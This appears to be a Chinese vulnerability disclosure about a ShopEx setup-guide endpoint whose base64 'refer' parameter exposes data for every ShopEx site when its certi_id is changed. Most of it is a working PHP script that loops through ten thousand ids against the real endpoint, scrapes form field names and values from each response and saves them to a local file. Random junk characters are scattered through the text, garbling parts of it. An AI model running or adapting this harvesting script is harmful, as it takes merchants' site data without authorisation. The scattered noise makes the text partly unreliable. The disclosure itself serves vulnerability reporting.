|
|
简要描述:
6 j; i; T' o" x+ Q( HShopEx某接口缺陷,可遍历所有网站: }( M& ~0 r1 O+ s( x( g+ |
详细说明:
; z, F* s6 N' }9 w问题出现在shopex 网店使用向导页面
}2 T5 f+ s- c( [5 m
5 B, I! E7 o3 [* Q* R" ]; n2 e. v, ?; m% G9 C# d7 y# c7 P l
' ~3 T+ L0 L$ b4 g) h+ U
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
8 j0 M& A8 S9 N* H
) a4 Z) `+ V& L8 Y( R
" [& K% n& I5 q" X9 K9 ?$ J2 n9 a, F3 F3 g6 a( `# x
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
6 p" ?1 N( q, ]+ p4 ^; L- z, x6 z, h+ `. X( _
/ B' r, U' C6 J, m1 ~# q6 b7 x k9 ?. ]( G, c/ y$ V; c
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 - S0 k% {" Y0 O) m
2 Q6 z$ v1 F$ R- l$ Y
+ s% v3 t- {1 Y4 B6 J* E7 V3 _) o+ `: ^4 X# k t
<?php( d, ~3 U3 u# q `% V
1 L. c/ n* c' s1 t% @( s0 u
for ($i=1; $i < 10000; $i++) { //遍历
, v/ o6 E! C7 E' v, K1 } M, x q/ \, `6 a/ K. ^; r, m9 W' J
ShowshopExD($i);
: M3 o8 K3 r' `. K% q
9 X' a% H) R" ^: E2 i% } c }
) I+ Z1 {) `) \6 z3 V+ ~9 Z4 }9 v' ?- ] M
function ShowshopExD($cid) {
, \- F* z% ^5 {
, g; w" l6 g0 D# L3 r8 L $url='http://guide.ecos.shopex.cn/step2.php';
; m" V4 B2 e& g( M1 b" U8 W! a2 |& S! D) a3 I$ k
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');" p( V9 i4 w! Z3 ?4 @- y& a
7 u2 \) ~- `9 F" X1 J9 k9 l $url = $url.'?refer='.$refer;* a) g0 D: \# d- e9 L
" f/ a' C2 d6 F
$ch = curl_init($url);
. o' N/ x. c) S. j- |* ]6 ~1 F6 [+ e6 l) v) i6 m% F" t; O
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
: z, q6 V! q5 U
1 u! Z( ~- [1 O1 x6 k curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 @# I+ g% K9 f! H3 b8 Y8 V6 c
5 p5 [0 z W9 z# \
$result = curl_exec($ch);
- z( w% j( g9 c
1 f4 Q+ X1 n" j: K; \5 ^0 W) U $result = mb_convert_encoding($result, "gb2312", "UTF-8");
( n V6 d& I7 N0 M* {
5 y9 P: C$ S3 E! E, S" w. Z6 M if(strpos($result,$refer))( U9 n1 f, o6 @9 ^0 \! f1 t
8 m! C: T8 e, a( ]" I% V# O
{" Q0 p( u. d9 Z+ r7 N
! ]8 b& ^- M. \' ~; B& D2 m
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件7 u8 D4 u* j0 J& ]/ H
1 J3 G) O! W& x
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);3 v' f, Q# O$ Q; E6 o: K7 A3 U0 g6 K
9 y: {$ }8 X3 v6 f; ]7 J; e
foreach ($value[1] as $key) {
3 e7 Y0 x- Z5 d) z& b
+ I. o% D: P9 G7 F9 O% n1 l preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
# E- L. z" Z& t6 \* z" J, m0 W& v1 R5 Z* i P% }/ j
echo $res[1][0].':'.$res[3][0]."\r\n";
. p" g$ |# I, G5 P
& Q/ i# p# i E4 q8 F2 v/ i $col =$res[1][0].':'.$res[3][0]."\r\n"; # ]' g9 H2 p( [) M+ f$ D H6 h, e
' m, o. I5 s' C
fwrite($fp, $col, strlen($col));
% j2 L2 }7 z4 [7 @# z5 N. ?; Y" ]' ?" m) r
}
( ]# h8 ]. H0 C1 g: _2 W1 m
: L, V# h9 f' I& z: r4 U- X echo '--------------------------------'."\r\n";, w3 o' g F) t- _: M
2 @( W( n5 z( m* }" F7 p# r fclose($fp); : i9 [$ p4 V# `( v q
: q ~$ j/ E4 H* W
}
# d4 L& l$ ?( Q3 ?+ G7 z, H: q0 _8 R L6 I% u% n
flush();. g" I, J; r' I/ o
) C5 N5 R/ v! {, m( v3 W
curl_close($ch);
! N) V5 {! w! e1 R
" E( S) m2 X9 ^/ p' Z2 K }
+ D8 ~* G& \% O7 b p. P: x$ J* K$ u* G! \( ?+ `# g
?>8 [3 @& ?0 Q2 d) N5 A s
漏洞证明:& r6 T7 @8 P- S2 J! U0 U
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg! |9 y& U) j' s
refer换成其他加密方式4 f+ z, R2 w3 P0 F w5 N
|
|